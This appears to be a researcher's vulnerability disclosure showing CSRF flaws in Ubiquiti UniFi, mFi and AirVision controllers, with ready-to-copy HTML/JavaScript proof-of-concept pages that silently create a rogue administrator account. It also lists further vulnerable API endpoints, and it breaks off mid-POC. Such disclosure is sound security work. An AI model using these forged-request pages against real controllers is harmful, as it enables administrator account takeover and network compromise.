<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The UniFi application is vulnerable to CSRF in multiple locations. The CWE link above has a good summary of the vulnerability class. In the POC below, I demonstrate how an unauthenticated attacker can send a malicious hyperlink to an authenticated administrator and, if the administrator clicks the link, force that administrator's browser to perform quite a few actions without the administrator knowing it. The most serious POC has the administrator's browser create a second administrator account. The attacker can then log into the Unifi controller with this second account (if they have network access to the Unifi controller) and perform any action an administrator can. </span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>CSRF POC #1 – Add Admin</b></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This screenshot shows the </span><span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Settings >> System page <span style="color: red;">before</span> the CSRF attack (the victim Admin is logged into the Unifi Controller):</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="178" src="https://lh4.googleusercontent.com/jUQ5YRvJRPdgEedzXqoF_zaEne2nXRH3Ul9KKiFAIh8rZu0xcPdE7Gb-n7_869b6UMOgrxaWxncd0CHR8od0Vwk-LNA6u62W_jtQ1lBXMGzAFWV4ggZEuDrM7-A_z6fNfulA2q66Rrs" style="-webkit-transform: rotate(0rad); border: currentColor;" width="348" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The victim navigates to the attacker’s malicious page (page source shown for clarification):</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="454" src="https://lh5.googleusercontent.com/fM111S1PrLurkDHp53y-e8dhmCfD4UsMCPev34CTgpDsNb9OmUHHe9U8IicBcusrdYVp6uOxVmDp_hjsy9U8fohCPsJlNd_xXbEB0V12qXrclZBO71SmBAYiupVYz0Y2aVrSGP35v8g" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Copyable POC:</span><br />
<br />
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: 624px;">
<pre><span style="color: green; font-weight: bold;"><html></span>
<span style="color: green; font-weight: bold;"><head></span>
<span style="color: green; font-weight: bold;"><script></span>
<span style="color: #aa22ff; font-weight: bold;">function</span> sendCSRF()
{
<span style="color: #aa22ff; font-weight: bold;">var</span> url_base <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://192.168.0.106:8443/api/add/admin"</span>;
<span style="color: #aa22ff; font-weight: bold;">var</span> post_data <span style="color: #666666;">=</span> <span style="color: #bb4444;">"%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"</span>;
<span style="color: #aa22ff; font-weight: bold;">var</span> xmlhttp <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> XMLHttpRequest();
xmlhttp.open(<span style="color: #bb4444;">"POST"</span>, url_base, <span style="color: #aa22ff; font-weight: bold;">true</span>);
xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Accept"</span>, <span style="color: #bb4444;">"*/*"</span>);
xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Content-type"</span>, <span style="color: #bb4444;">"application/x-www-form-urlencoded; charset=UTF-8"</span>);
<span style="color: #888888;">// the browser attaches the victim's existing controller session cookie</span>
xmlhttp.withCredentials <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">true</span>;
xmlhttp.send(post_data);
}
<span style="color: green; font-weight: bold;"></script></span>
<span style="color: green; font-weight: bold;"></head></span>
<span style="color: green; font-weight: bold;"><body</span> <span style="color: #bb4444;">onload="sendCSRF()"</span><span style="color: green; font-weight: bold;">></span>
<span style="color: green; font-weight: bold;"><h1></span>CSRF POC<span style="color: green; font-weight: bold;"></h1></span>
Sending CSRF Payload!!!
<span style="color: green; font-weight: bold;"></body></span>
<span style="color: green; font-weight: bold;"></html></span></pre>
</div>
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Here is a proxy view from the perspective of the victim Admin:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">First the admin’s browser goes to </span><a href="http://www.malicious-site.com/" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicious-site.com</span></a><span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;"> and pulls the attacker’s CSRF payload page</span></div>
</li>
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 8pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">Then the admin’s browser loads the forged request that will add another admin on the UniFi Controller</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="209" src="https://lh3.googleusercontent.com/UpHcS2d8eYEwR-Z8g3MXPCDzZnVXJk63Gb3jErYMgqG8OY1qU6sEQt8zpDgZFkNIqBK1SyqeKiXKLXd1MscNStE1tTu5Zcaq7c_cDVYfsRwC1pV_V0zdXL2aXGM-98xNGmvgNusZEok" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The forged request is shown below. You can see that the Referer is </span><a href="http://www.malicious-site.com/csrf.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicious-site.com/csrf.html</span></a><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, and not the Unifi Controller. The Same Origin Policy only stops the attacker’s page from reading the response; it does not stop the browser from attaching the admin’s valid session cookie when the request is sent to the Unifi Controller:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="468" src="https://lh6.googleusercontent.com/HGxNTcBJGzCAi5iMJummUiQOOyDslpr04HjB2q-PZ2AyYCOFGJFwXX2zNAq17Oi0ksVNlfS3o3kTOlPBidJNC4T3rW1ZIiASvAdRriJ_mTxPmXHQNjx9Dd-szAFDovXYbyr67LEPHrQ" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The response, showing the new admin was created successfully:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="378" src="https://lh6.googleusercontent.com/W-J5fo8FrYmu0SZiloFc9LtrslKpc8y7dLzAD6EovURMDu9j3RD79mdSkSpg-VX4JywX8InpkaY8y0XgKEKiHu3TXNdymb4w-UVN4bTRdU-HTLSgldZLa-EQfqEnppygsGqp8O2QVUU" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The next two screenshots show the attacker logging in after the attack:</span><br />
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="394" src="https://lh3.googleusercontent.com/scRbMdjw9Dz1IQjQ91gY8KwKuiUhswKBd-cA6GiYP0-8rf39GHWS7WBjQJJ00Ezr8R2VbMjeK-3EtxdVbU9J3LY18vWKrmFIu9t1qrlLFyiSwiG_8CkdRqgff-Hp3r3CoZZ_VJY36fI" style="-webkit-transform: rotate(0rad); border: currentColor;" width="534" /></span></div>
<br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System page </span><span style="color: red; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">after</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> the CSRF attack </span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="195" src="https://lh3.googleusercontent.com/Bt0Iaq2k-xo_4CmOQvzJVvRocmcnyr9lUElGISK0KrnXSQBC28GG5PPp_D8uD8_h1WyHOuKiLubEeRJZbSe_ZmwjG0E80YfrVx5uoWIl9hgKFeaB99Hi_Wb4JFmInME7aZf8XSfBq0s" style="-webkit-transform: rotate(0rad); border: currentColor;" width="504" /></span></div>
<br />
<br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The next POC is another example of how an attacker can use CSRF to update and enable the syslog server on the Unifi Controller. I was working on this one before I figured out that the /api/add/admin function existed:</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>CSRF POC #2 – Update syslog server</b></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (Before CSRF attack)</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="517" src="https://lh4.googleusercontent.com/yWyRFTxp437AT1uPl6fPbGYeQzNY84shOgpnkKQ4dQ6bQ-UPJSZYzaQpWiHJn6H4-zNJVAJFoIffcuNhtdfy66ERK0mnUwuxqNTbndiG1h4YjaKxNuZau4ODqyVj--1fnnSEHUmwgLg" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Here is the CSRF attack page on the attacker’s server:</span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="194" src="https://lh5.googleusercontent.com/7qA5Hkl8f-CCh6dUYpBurUNSJPWLC6qAB36CtT_ppMjxbrTSd8MhWIrsCrnBzrMM9YTiXz8z_I9XOVxDHnHMcZak0Sg9-fNre76v4nnZUCrk5ZIbH33J6BuFAmz_npazGWWfzIzohQk" style="-webkit-transform: rotate(0rad); border: currentColor;" width="552" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="298" src="https://lh3.googleusercontent.com/8gNDCJmKLZxvvoxIgGzdW2Ud8eWlY6l5mQYbFZsdslq-at95w0hAL9lWm7zjBdL38Cf-Dvdcm9al7O1TFzamAorKvyPzkCksutq1EpLiO6mn6vbDjPgSTkft5NIEjotpeERhA6AOjQY" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (After CSRF attack)</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="460" src="https://lh6.googleusercontent.com/aJgmk5VxfWFTLkU2UZFG9LhH_CBTLFmlw3lFLmkB35KNhiulw3C0-5MoqM8w_MeQT7DCjOVZKT2P46ylmE6P77VjTOio9e2adqPWgtvVL0LmEXbyaT03GIByV3lORLQTE_nG2-yCHSM" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="161" src="https://lh6.googleusercontent.com/5e-PyyzGFpKUIXSeLLaT0covDRAW2h_B6XWhKhwIltjh6laCAt4lxF70dF2WBolCYaC6imYs_oWasxqmyWlDAkLrcI0ZVu9j23ogAtHNiC8XXRq2u936JUvwUM3xb9j1cJknhCd-bzc" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The forged request:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="304" src="https://lh5.googleusercontent.com/8ptTTGUlUjmdgZPrQyuGVgrf860zXmpVSyqsZavEZVt2rux3el5pAjQ5hjPnkrDdX3xaZm4xynNipENCFEKyxcNaODhhw49Og0NR5lWs0eBmcyrhUw0GjfaAwNGwBn39TpkLED8EZu4" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The response:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="207" src="https://lh3.googleusercontent.com/08VgpGkA730MTRwQ7k2wFSR1SyFEWbdKMFJx51FrpooRpBh4EvbABU4n-V0XiwFjcoLnXaYbk3xc2C5AKtIlAFPPCSOOJadrXlHKXWs-lvJqcET2pDLhWgwt7g6o4idYUfb44QkAKvc" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Syslog messages from AP (begin as soon as CSRF is executed)</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="111" src="https://lh6.googleusercontent.com/Sh6qWwTEo7gjhR9xIfODqvFlvFfwPoZAO9o2lXLnZ19-YU40f6XBZdJa_wqLLHPdbNy5-ftVmEEGk0o3ThAVdgNWS6fQrWRR89r2WtaKal05zPCNQKnsOc1VuSAeAZUPpNvAF4gntMw" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In addition to these POCs, any function that does not require an unpredictable nonce in the request is vulnerable to CSRF. This includes:</span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/add/wlanconf</span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/set/setting/guest_access</span><span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Change almost anything on this page (guest password, authentication method, restricted subnets):</span><br />
</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="300" src="https://lh4.googleusercontent.com/50I-kdvgLSrfMYpKYxGeXWITJu_20-TtpkxIBCSEu76Z4jMo-RhdoFF2Esd99MsywSyPQGqO7ydSuf3R3MrlCS8RxWivbVFz34dW9R_VBPIyGrBCcfKT60wNro-DqlYNwg2S7I4RJmc" style="-webkit-transform: rotate(0rad); border: currentColor;" width="559" /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/cmd/stamgr</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Block users by MAC address</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Unblock users by MAC address</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Reconnect users by MAC address</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/set/setting/rsyslogd</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Configure the syslog server and port</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/set/setting/smtp</span><span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/cmd/cfgmgr</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Configure the syslog server, port, authentication settings</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POST /api/set/setting/identity</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Setting the name of the Unifi Controller</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<h1 dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti - </span><span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; line-height: 1.0791; white-space: pre-wrap;">mFi Controller v2.0.15 - </span><span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; line-height: 1.0791; white-space: pre-wrap;">Cross-site Request Forgery (CSRF)</span></h1>
</div>
<div>
<span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; line-height: 1.0791; white-space: pre-wrap;"><br /></span></div>
<div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">While this walkthrough is not as complete as the previous one, this screenshot shows that the mFi Controller exhibits the same CSRF vulnerability. </span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="310" src="https://lh3.googleusercontent.com/g9DHE4Ky6yo7CJh-3rP1nB74lq-2eo7hiRF2Dyr9OZ2g1AufqMfH0LD8JugQQIGQWWRiGiZKxsv6S4KJbI4zPBHQ4NAUCUReSwIlzi3lNJIYmi5aob4K6-b4Oh-v7Y_FnIwHPGQ46oM" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Copyable POC:</span><br />
<br />
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: 624px;">
<pre><span style="color: green; font-weight: bold;">&lt;html&gt;</span>
<span style="color: green; font-weight: bold;">&lt;head&gt;</span>
<span style="color: green; font-weight: bold;">&lt;script&gt;</span>
<span style="color: #aa22ff; font-weight: bold;">function</span> sendCSRF()
{
    <span style="color: #888888;">// mFi Controller "add admin" endpoint on the lab host</span>
    <span style="color: #aa22ff; font-weight: bold;">var</span> url_base <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://192.168.0.106:6443/api/v1.0/add/admin"</span>;
    <span style="color: #888888;">// URL-encoded JSON body: {"name":"csrf","lang":"en_US","x_password":"csrf"}</span>
    <span style="color: #aa22ff; font-weight: bold;">var</span> post_data <span style="color: #666666;">=</span> <span style="color: #bb4444;">"%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"</span>;
    <span style="color: #aa22ff; font-weight: bold;">var</span> xmlhttp <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> XMLHttpRequest();
    xmlhttp.open(<span style="color: #bb4444;">"POST"</span>, url_base, <span style="color: #aa22ff; font-weight: bold;">true</span>);
    xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Accept"</span>, <span style="color: #bb4444;">"*/*"</span>);
    xmlhttp.setRequestHeader(<span style="color: #bb4444;">"Content-type"</span>, <span style="color: #bb4444;">"application/x-www-form-urlencoded; charset=UTF-8"</span>);
    <span style="color: #888888;">// withCredentials makes the browser attach the victim's existing session cookie</span>
    xmlhttp.withCredentials <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">true</span>;
    xmlhttp.send(post_data);
}
<span style="color: green; font-weight: bold;">&lt;/script&gt;</span>
<span style="color: green; font-weight: bold;">&lt;/head&gt;</span>
<span style="color: green; font-weight: bold;">&lt;body</span> <span style="color: #bb4444;">onload="sendCSRF()"</span><span style="color: green; font-weight: bold;">&gt;</span>
<span style="color: green; font-weight: bold;">&lt;h1&gt;</span>CSRF POC<span style="color: green; font-weight: bold;">&lt;/h1&gt;</span>
Sending CSRF Payload!!!
<span style="color: green; font-weight: bold;">&lt;/body&gt;</span>
<span style="color: green; font-weight: bold;">&lt;/html&gt;</span></pre>
</div>
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
<div>
<h1 dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #2e74b5; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti - AirVision Controller v2.1.3 - Cross-site Request Forgery (CSRF)</span></h1>
</div>
<div>
<br /></div>
<div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;">I will also use the same POC for the AirVision controller. </span></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>CSRF POC #1– Add Admin</b></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (Before CSRF attack) (The victim "Seth" logged into AirVision Controller)</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="344" src="https://lh3.googleusercontent.com/cBHOI5O2jGU1FBKxJGuhvBkmebY75QtTWJGGUjkjcM7Rp_xCZJUm1I1mWO8lL0s2L_HMqH-BSmn79r__j9hkt8FpnDIrWeq8Tn4wbFEEWDaogQU35QW5-IIMV7e-TMafHHT3kPET8no" style="-webkit-transform: rotate(0rad); border: currentColor;" width="525" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The victim navigates to the attacker’s malicious page (page source shown for clarification):</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="574" src="https://lh5.googleusercontent.com/G4NNI6HmOKJkxEdAYDbSzKNNNPCsllgBfyTO1bKDW5q1RtPQXqWhU0921xaRN6QebHLjxUdOu5EyY-DPtpM7iwWdqlLw5Gt2cB5goQr8-iDLqPyHD_EmAInuy7Mx4PdN5Qg7Maikv0M" style="-webkit-transform: rotate(0rad); border: currentColor;" width="561" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Copyable POC:</span><br />
<br />
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: 624px;">
<pre><span style="color: green; font-weight: bold;">&lt;html&gt;</span>
<span style="color: green; font-weight: bold;">&lt;head&gt;</span>
<span style="color: green; font-weight: bold;">&lt;script&gt;</span>
<span style="color: #aa22ff; font-weight: bold;">function</span> sendCSRF()
{
    <span style="color: #888888;">// AirVision Controller "add admin" endpoint on the lab host</span>
    <span style="color: #aa22ff; font-weight: bold;">var</span> url_base <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://192.168.0.106:7443/api/v2.0/admin"</span>;
